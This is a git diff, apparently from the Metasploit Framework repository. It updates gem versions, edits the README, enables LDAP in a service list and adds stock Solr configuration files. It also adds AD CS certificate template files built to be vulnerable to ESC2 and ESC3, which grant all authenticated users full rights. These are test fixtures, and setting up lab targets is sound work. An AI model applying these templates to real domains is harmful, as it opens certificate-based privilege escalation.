 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.5, MIT
+http-cookie, 1.0.6, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.14.1, MIT
-io-console, 0.6.0, "ruby, Simplified BSD"
+i18n, 1.14.5, MIT
+io-console, 0.7.2, "ruby, Simplified BSD"
 irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.3, ruby
+json, 2.7.2, ruby
 language_server-protocol, 3.17.0.3, MIT
 little-plugger, 1.1.4, MIT
-logging, 2.3.1, MIT
-loofah, 2.21.3, MIT
+logging, 2.4.0, MIT
+loofah, 2.22.0, MIT
 macaddr, 1.7.2, ruby
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.2, "New BSD"
-metasploit-credential, 6.0.6, "New BSD"
-metasploit-framework, 6.3.55, "New BSD"
+metasploit-credential, 6.0.9, "New BSD"
+metasploit-framework, 6.4.22, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
-metasploit-payloads, 2.0.165, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.166, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.3, "New BSD"
-metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
-method_source, 1.0.0, MIT
-mime-types, 3.5.1, MIT
-mime-types-data, 3.2023.1003, MIT
-mini_portile2, 2.8.4, MIT
-minitest, 5.20.0, MIT
+metasploit_payloads-mettle, 1.0.31, "3-clause (or ""modified"") BSD"
+method_source, 1.1.0, MIT
+mime-types, 3.5.2, MIT
+mime-types-data, 3.2024.0604, MIT
+mini_portile2, 2.8.7, MIT
+minitest, 5.23.1, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
+mutex_m, 0.2.0, "ruby, Simplified BSD"
 nessus_rest, 0.1.6, MIT
-net-imap, 0.4.0, "ruby, Simplified BSD"
-net-ldap, 0.18.0, MIT
-net-protocol, 0.2.1, "ruby, Simplified BSD"
-net-smtp, 0.4.0, "ruby, Simplified BSD"
-net-ssh, 7.2.0, MIT
+net-imap, 0.4.12, "ruby, Simplified BSD"
+net-ldap, 0.19.0, MIT
+net-protocol, 0.2.2, "ruby, Simplified BSD"
+net-sftp, 4.0.0, MIT
+net-smtp, 0.5.0, "ruby, Simplified BSD"
+net-ssh, 7.2.3, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.5.9, MIT
-nokogiri, 1.14.5, MIT
-nori, 2.6.0, MIT
+nio4r, 2.7.3, "MIT, Simplified BSD"
+nokogiri, 1.16.5, MIT
+nori, 2.7.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 2.0.0, "New BSD"
-parallel, 1.23.0, MIT
-parser, 3.2.2.4, MIT
+parallel, 1.24.0, MIT
+parser, 3.3.2.0, MIT
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.1, LGPL-2.1
-pdf-reader, 2.11.0, MIT
-pg, 1.5.4, "Simplified BSD"
+pcaprub, 0.13.3, LGPL-2.1
+pdf-reader, 2.12.0, MIT
+pg, 1.5.6, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
-public_suffix, 5.0.3, MIT
-puma, 6.4.0, "New BSD"
-racc, 1.7.1, "ruby, Simplified BSD"
-rack, 2.2.8, MIT
-rack-protection, 3.1.0, MIT
+public_suffix, 5.0.5, MIT
+puma, 6.4.2, "New BSD"
+racc, 1.8.0, "ruby, Simplified BSD"
+rack, 2.2.9, MIT
+rack-protection, 3.2.0, MIT
 rack-test, 2.1.0, MIT
 rails-dom-testing, 2.2.0, MIT
 rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8, MIT
+railties, 7.0.8.4, MIT
 rainbow, 3.1.1, MIT
-rake, 13.0.6, MIT
-rasn1, 0.12.1, MIT
+rake, 13.2.1, MIT
+rasn1, 0.13.0, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.2, unknown
+recog, 3.1.5, unknown
 redcarpet, 3.6.0, MIT
-regexp_parser, 2.8.1, MIT
-reline, 0.4.1, ruby
+regexp_parser, 2.9.2, MIT
+reline, 0.5.8, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.15, "New BSD"
 rex-bin_tools, 0.1.9, "New BSD"
-rex-core, 0.1.31, "New BSD"
+rex-core, 0.1.32, "New BSD"
 rex-encoder, 0.1.7, "New BSD"
 rex-exploitation, 0.1.39, "New BSD"
 rex-java, 0.1.7, "New BSD"
@@ -146,55 +154,54 @@ rex-mime, 0.1.8, "New BSD"
 rex-nop, 0.1.3, "New BSD"
 rex-ole, 0.1.8, "New BSD"
 rex-powershell, 0.1.99, "New BSD"
-rex-random_identifier, 0.1.11, "New BSD"
+rex-random_identifier, 0.1.12, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.55, "New BSD"
+rex-socket, 0.1.57, "New BSD"
 rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.53, "New BSD"
+rex-text, 0.2.58, "New BSD"
 rex-zip, 0.1.5, "New BSD"
-rexml, 3.2.6, "Simplified BSD"
+rexml, 3.2.8, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.12.0, MIT
-rspec-core, 3.12.2, MIT
-rspec-expectations, 3.12.3, MIT
-rspec-mocks, 3.12.6, MIT
-rspec-rails, 6.0.3, MIT
+rspec, 3.13.0, MIT
+rspec-core, 3.13.0, MIT
+rspec-expectations, 3.13.0, MIT
+rspec-mocks, 3.13.1, MIT
+rspec-rails, 6.1.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.12.1, MIT
-rubocop, 1.56.4, MIT
-rubocop-ast, 1.29.0, MIT
-ruby-macho, 4.0.0, MIT
+rspec-support, 3.13.1, MIT
+rubocop, 1.64.1, MIT
+rubocop-ast, 1.31.3, MIT
+ruby-macho, 4.0.1, MIT
 ruby-mysql, 4.1.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.2, "New BSD"
-rubyntlm, 0.6.3, MIT
+ruby_smb, 3.3.9, "New BSD"
+rubyntlm, 0.6.4, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
-simpleidn, 0.2.1, MIT
-sinatra, 3.1.0, MIT
-sqlite3, 1.6.6, "New BSD"
+simpleidn, 0.2.3, MIT
+sinatra, 3.2.0, MIT
+sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
+strscan, 3.1.0, "ruby, Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 systemu, 2.6.5, ruby
-test-prof, 1.2.3, MIT
+test-prof, 1.3.3, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.2.2, MIT
+thor, 1.3.1, MIT
 tilt, 2.3.0, MIT
-timecop, 0.9.8, MIT
-timeout, 0.4.0, "ruby, Simplified BSD"
-ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
+timecop, 0.9.9, MIT
+timeout, 0.4.1, "ruby, Simplified BSD"
+ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2023.3, MIT
-unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.8.2, MIT
+tzinfo-data, 1.2024.1, MIT
 unicode-display_width, 2.5.0, MIT
 unix-crypt, 1.3.1, 0BSD
 uuid, 2.3.9, MIT
@@ -207,5 +214,5 @@ windows_error, 0.1.5, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
-yard, 0.9.34, MIT
-zeitwerk, 2.6.12, MIT
+yard, 0.9.36, MIT
+zeitwerk, 2.6.15, MIT
@@ -34,10 +34,8 @@ Using Metasploit
 --
 Metasploit can do all sorts of things. The first thing you'll want to do
 is start `msfconsole`, but after that, you'll probably be best served by
-reading [Metasploit Unleashed][unleashed], the [great community
-resources](https://metasploit.github.io), or take a look at the
-[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
-page on the documentation website.
+reading the basics of [using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
+or [Metasploit Unleashed][unleashed].

 Contributing
 --
@@ -1,5 +1,5 @@
 ---
-# Creates a template that will be vulnerable to ESC 1 (subject name supplied in
+# Creates a template that will be vulnerable to ESC1 (subject name supplied in
 # the request). Fields are based on the SubCA template. For field descriptions,
 # see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
 showInAdvancedViewOnly: 'TRUE'
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC2 (any purpose EKU).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExtendedKeyUsage:
+# Any Purpose OID
+- 2.5.29.37.0
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC3 (certificate request agent EKU).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExtendedKeyUsage:
+# Certificate Request Agent OID
+- 1.3.6.1.4.1.311.20.2.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -224,6 +224,7 @@ queries:
      - adminCount
      - managedBy
      - groupAttributes
+      - objectSID
    references:
      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
  - action: ENUM_GROUP_POLICY_OBJECTS
@@ -16,6 +16,8 @@ services:
    enabled: yes
  - type: IMAP
    enabled: yes
+  - type: LDAP
+    enabled: yes
  - type: MSSQL
    enabled: yes
  - type: MySQL
@@ -0,0 +1,244 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<schema name="default-config" version="1.6">
+
+    <field name="id" type="string" indexed="true" stored="true" required="true" multiValued="false" />
+    <field name="_version_" type="plong" indexed="false" stored="false"/>
+    <field name="_root_" type="string" indexed="true" stored="false" docValues="false" />
+    <field name="_nest_path_" type="_nest_path_" /><fieldType name="_nest_path_" class="solr.NestPathField" />
+    <field name="_text_" type="text_general" indexed="true" stored="false" multiValued="true"/>
+    <dynamicField name="*_i"  type="pint"    indexed="true"  stored="true"/>
+    <dynamicField name="*_is" type="pints"    indexed="true"  stored="true"/>
+    <dynamicField name="*_s"  type="string"  indexed="true"  stored="true" />
+    <dynamicField name="*_ss" type="strings"  indexed="true"  stored="true"/>
+    <dynamicField name="*_l"  type="plong"   indexed="true"  stored="true"/>
+    <dynamicField name="*_ls" type="plongs"   indexed="true"  stored="true"/>
+    <dynamicField name="*_t" type="text_general" indexed="true" stored="true" multiValued="false"/>
+    <dynamicField name="*_txt" type="text_general" indexed="true" stored="true"/>
+    <dynamicField name="*_b"  type="boolean" indexed="true" stored="true"/>
+    <dynamicField name="*_bs" type="booleans" indexed="true" stored="true"/>
+    <dynamicField name="*_f"  type="pfloat"  indexed="true"  stored="true"/>
+    <dynamicField name="*_fs" type="pfloats"  indexed="true"  stored="true"/>
+    <dynamicField name="*_d"  type="pdouble" indexed="true"  stored="true"/>
+    <dynamicField name="*_ds" type="pdoubles" indexed="true"  stored="true"/>
+    <dynamicField name="random_*" type="random"/>
+    <dynamicField name="ignored_*" type="ignored"/>
+    <dynamicField name="*_str" type="strings" stored="false" docValues="true" indexed="false" useDocValuesAsStored="false"/>
+    <dynamicField name="*_dt"  type="pdate"    indexed="true"  stored="true"/>
+    <dynamicField name="*_dts" type="pdate"    indexed="true"  stored="true" multiValued="true"/>
+    <dynamicField name="*_p"  type="location" indexed="true" stored="true"/>
+    <dynamicField name="*_srpt"  type="location_rpt" indexed="true" stored="true"/>
+    <dynamicField name="*_dpf" type="delimited_payloads_float" indexed="true"  stored="true"/>
+    <dynamicField name="*_dpi" type="delimited_payloads_int" indexed="true"  stored="true"/>
+    <dynamicField name="*_dps" type="delimited_payloads_string" indexed="true"  stored="true"/>
+    <dynamicField name="attr_*" type="text_general" indexed="true" stored="true" multiValued="true"/>
+    <uniqueKey>id</uniqueKey>
+    <fieldType name="string" class="solr.StrField" sortMissingLast="true" docValues="true" />
+    <fieldType name="strings" class="solr.StrField" sortMissingLast="true" multiValued="true" docValues="true" />
+    <fieldType name="boolean" class="solr.BoolField" sortMissingLast="true"/>
+    <fieldType name="booleans" class="solr.BoolField" sortMissingLast="true" multiValued="true"/>
+    <fieldType name="pint" class="solr.IntPointField" docValues="true"/>
+    <fieldType name="pfloat" class="solr.FloatPointField" docValues="true"/>
+    <fieldType name="plong" class="solr.LongPointField" docValues="true"/>
+    <fieldType name="pdouble" class="solr.DoublePointField" docValues="true"/>
+    <fieldType name="pints" class="solr.IntPointField" docValues="true" multiValued="true"/>
+    <fieldType name="pfloats" class="solr.FloatPointField" docValues="true" multiValued="true"/>
+    <fieldType name="plongs" class="solr.LongPointField" docValues="true" multiValued="true"/>
+    <fieldType name="pdoubles" class="solr.DoublePointField" docValues="true" multiValued="true"/>
+    <fieldType name="random" class="solr.RandomSortField" indexed="true"/>
+    <fieldType name="ignored" stored="false" indexed="false" multiValued="true" class="solr.StrField" />
+    <fieldType name="pdate" class="solr.DatePointField" docValues="true"/>
+    <fieldType name="pdates" class="solr.DatePointField" docValues="true" multiValued="true"/>
+    <fieldType name="binary" class="solr.BinaryField"/>
+    <fieldType name="rank" class="solr.RankField"/>
+    <dynamicField name="*_ws" type="text_ws"  indexed="true"  stored="true"/>
+    <fieldType name="text_ws" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="text_general" class="solr.TextField" positionIncrementGap="100" multiValued="true">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_t_sort" type="text_gen_sort" indexed="true" stored="true" multiValued="false"/>
+    <dynamicField name="*_txt_sort" type="text_gen_sort" indexed="true" stored="true"/>
+    <fieldType name="text_gen_sort" class="solr.SortableTextField" positionIncrementGap="100" multiValued="true">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en" type="text_en"  indexed="true"  stored="true"/>
+    <fieldType name="text_en" class="solr.TextField" positionIncrementGap="100">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="lowercase"/>
+        <filter name="englishPossessive"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="lowercase"/>
+        <filter name="englishPossessive"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en_split" type="text_en_splitting"  indexed="true"  stored="true"/>
+    <fieldType name="text_en_splitting" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
+      <analyzer type="index">
+        <tokenizer name="whitespace"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="1" catenateNumbers="1" catenateAll="0" splitOnCaseChange="1"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+        <filter name="flattenGraph" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="0" catenateNumbers="0" catenateAll="0" splitOnCaseChange="1"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en_split_tight" type="text_en_splitting_tight"  indexed="true"  stored="true"/>
+    <fieldType name="text_en_splitting_tight" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
+      <analyzer type="index">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
+        <filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
+        <filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="englishMinimalStem"/>
+        <filter name="removeDuplicates"/>
+        <filter name="flattenGraph" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
+        <filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
+        <filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="englishMinimalStem"/>
+        <filter name="removeDuplicates"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_rev" type="text_general_rev"  indexed="true"  stored="true"/>
+    <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+        <filter name="reversedWildcard" withOriginal="true"
+                maxPosAsterisk="3" maxPosQuestion="2" maxFractionAsterisk="0.33"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_phon_en" type="phonetic_en"  indexed="true"  stored="true"/>
+    <fieldType name="phonetic_en" stored="false" indexed="true" class="solr.TextField" >
+      <analyzer>
+        <tokenizer name="standard"/>
+        <filter name="doubleMetaphone" inject="false"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_s_lower" type="lowercase"  indexed="true"  stored="true"/>
+    <fieldType name="lowercase" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="keyword"/>
+        <filter name="lowercase" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_descendent_path" type="descendent_path"  indexed="true"  stored="true"/>
+    <fieldType name="descendent_path" class="solr.TextField">
+      <analyzer type="index">
+        <tokenizer name="pathHierarchy" delimiter="/" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="keyword" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_ancestor_path" type="ancestor_path"  indexed="true"  stored="true"/>
+    <fieldType name="ancestor_path" class="solr.TextField">
+      <analyzer type="index">
+        <tokenizer name="keyword" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="pathHierarchy" delimiter="/" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_point" type="point"  indexed="true"  stored="true"/>
+    <fieldType name="point" class="solr.PointType" dimension="2" subFieldSuffix="_d"/>
+    <fieldType name="location" class="solr.LatLonPointSpatialField" docValues="true"/>
+    <fieldType name="location_rpt" class="solr.SpatialRecursivePrefixTreeFieldType"
+               geo="true" distErrPct="0.025" maxDistErr="0.001" distanceUnits="kilometers" />
+    <fieldType name="delimited_payloads_float" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="float"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="delimited_payloads_int" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="integer"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="delimited_payloads_string" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="identity"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_cjk" type="text_cjk"  indexed="true"  stored="true"/>
+    <fieldType name="text_cjk" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="standard"/>
+        <filter name="CJKWidth"/>
+        <filter name="lowercase"/>
+        <filter name="CJKBigram"/>
+      </analyzer>
+    </fieldType>
+</schema>
@@ -0,0 +1,262 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<config>
+  <luceneMatchVersion>9.0</luceneMatchVersion>
+  <dataDir>${solr.data.dir:}</dataDir>
+  <directoryFactory name="DirectoryFactory"
+                    class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
+  <codecFactory class="solr.SchemaCodecFactory"/>
+  <indexConfig>
+    <lockType>${solr.lock.type:native}</lockType>
+  </indexConfig>
+  <updateHandler class="solr.DirectUpdateHandler2">
+
+    <updateLog>
+      <str name="dir">${solr.ulog.dir:}</str>
+      <int name="numVersionBuckets">${solr.ulog.numVersionBuckets:65536}</int>
+    </updateLog>
+
+    <autoCommit>
+      <maxTime>${solr.autoCommit.maxTime:15000}</maxTime>
+      <openSearcher>false</openSearcher>
+    </autoCommit>
+
+    <autoSoftCommit>
+      <maxTime>${solr.autoSoftCommit.maxTime:-1}</maxTime>
+    </autoSoftCommit>
+
+  </updateHandler>
+
+  <query>
+
+    <maxBooleanClauses>${solr.max.booleanClauses:1024}</maxBooleanClauses>
+
+    <filterCache size="512"
+                 initialSize="512"
+                 autowarmCount="0"/>
+    <queryResultCache size="512"
+                      initialSize="512"
+                      autowarmCount="0"/>
+
+    <documentCache size="512"
+                   initialSize="512"
+                   autowarmCount="0"/>
+
+    <cache name="perSegFilter"
+           class="solr.CaffeineCache"
+           size="10"
+           initialSize="0"
+           autowarmCount="10"
+           regenerator="solr.NoOpRegenerator" />
+
+    <enableLazyFieldLoading>true</enableLazyFieldLoading>
+
+    <queryResultWindowSize>20</queryResultWindowSize>
+
+    <queryResultMaxDocsCached>200</queryResultMaxDocsCached>
+
+    <listener event="newSearcher" class="solr.QuerySenderListener">
+      <arr name="queries">
+      </arr>
+    </listener>
+    <listener event="firstSearcher" class="solr.QuerySenderListener">
+      <arr name="queries">
+      </arr>
+    </listener>
+
+    <useColdSearcher>false</useColdSearcher>
+
+  </query>
+
+    <circuitBreakers enabled="true">
+
+  </circuitBreakers>
+
+  <requestDispatcher>
+
+    <httpCaching never304="true" />
+  </requestDispatcher>
+
+  <requestHandler name="/select" class="solr.SearchHandler">
+    <lst name="defaults">
+      <str name="echoParams">explicit</str>
+      <int name="rows">10</int>
+    </lst>
+  </requestHandler>
+  <requestHandler name="/query" class="solr.SearchHandler">
+    <lst name="defaults">
+      <str name="echoParams">explicit</str>
+      <str name="wt">json</str>
+      <str name="indent">true</str>
+    </lst>
+  </requestHandler>
+  <initParams path="/update/**,/query,/select,/spell">
+    <lst name="defaults">
+      <str name="df">_text_</str>
+    </lst>
+  </initParams>
+  <searchComponent name="spellcheck" class="solr.SpellCheckComponent">
+    <str name="queryAnalyzerFieldType">text_general</str>
+    <lst name="spellchecker">
+      <str name="name">default</str>
+      <str name="field">_text_</str>
+      <str name="classname">solr.DirectSolrSpellChecker</str>
+      <str name="distanceMeasure">internal</str>
+      <float name="accuracy">0.5</float>
+      <int name="maxEdits">2</int>
+      <int name="minPrefix">1</int>
+      <int name="maxInspections">5</int>
+      <int name="minQueryLength">4</int>
+      <float name="maxQueryFrequency">0.01</float>
+    </lst>
+  </searchComponent>
+  <requestHandler name="/spell" class="solr.SearchHandler" startup="lazy">
+    <lst name="defaults">
+      <str name="spellcheck.dictionary">default</str>
+      <str name="spellcheck">on</str>
+      <str name="spellcheck.extendedResults">true</str>
+      <str name="spellcheck.count">10</str>
+      <str name="spellcheck.alternativeTermCount">5</str>
+      <str name="spellcheck.maxResultsForSuggest">5</str>
+      <str name="spellcheck.collate">true</str>
+      <str name="spellcheck.collateExtendedResults">true</str>
+      <str name="spellcheck.maxCollationTries">10</str>
+      <str name="spellcheck.maxCollations">5</str>
+    </lst>
+    <arr name="last-components">
+      <str>spellcheck</str>
+    </arr>
+  </requestHandler>
+  <searchComponent class="solr.HighlightComponent" name="highlight">
+    <highlighting>
+      <fragmenter name="gap"
+                  default="true"
+                  class="solr.highlight.GapFragmenter">
+        <lst name="defaults">
+          <int name="hl.fragsize">100</int>
+        </lst>
+      </fragmenter>
+
+      <fragmenter name="regex"
+                  class="solr.highlight.RegexFragmenter">
+        <lst name="defaults">
+          <int name="hl.fragsize">70</int>
+          <float name="hl.regex.slop">0.5</float>
+          <str name="hl.regex.pattern">[-\w ,/\n\&quot;&apos;]{20,200}</str>
+        </lst>
+      </fragmenter>
+      <formatter name="html"
+                 default="true"
+                 class="solr.highlight.HtmlFormatter">
+        <lst name="defaults">
+          <str name="hl.simple.pre"><![CDATA[<em>]]></str>
+          <str name="hl.simple.post"><![CDATA[</em>]]></str>
+        </lst>
+      </formatter>
+      <encoder name="html"
+               class="solr.highlight.HtmlEncoder" />
+
+      <fragListBuilder name="simple"
+                       class="solr.highlight.SimpleFragListBuilder"/>
+
+      <fragListBuilder name="single"
+                       class="solr.highlight.SingleFragListBuilder"/>
+
+      <fragListBuilder name="weighted"
+                       default="true"
+                       class="solr.highlight.WeightedFragListBuilder"/>
+
+      <fragmentsBuilder name="default"
+                        default="true"
+                        class="solr.highlight.ScoreOrderFragmentsBuilder">
+      </fragmentsBuilder>
+
+      <fragmentsBuilder name="colored"
+                        class="solr.highlight.ScoreOrderFragmentsBuilder">
+        <lst name="defaults">
+          <str name="hl.tag.pre"><![CDATA[
+               <b style="background:yellow">,<b style="background:lawgreen">,
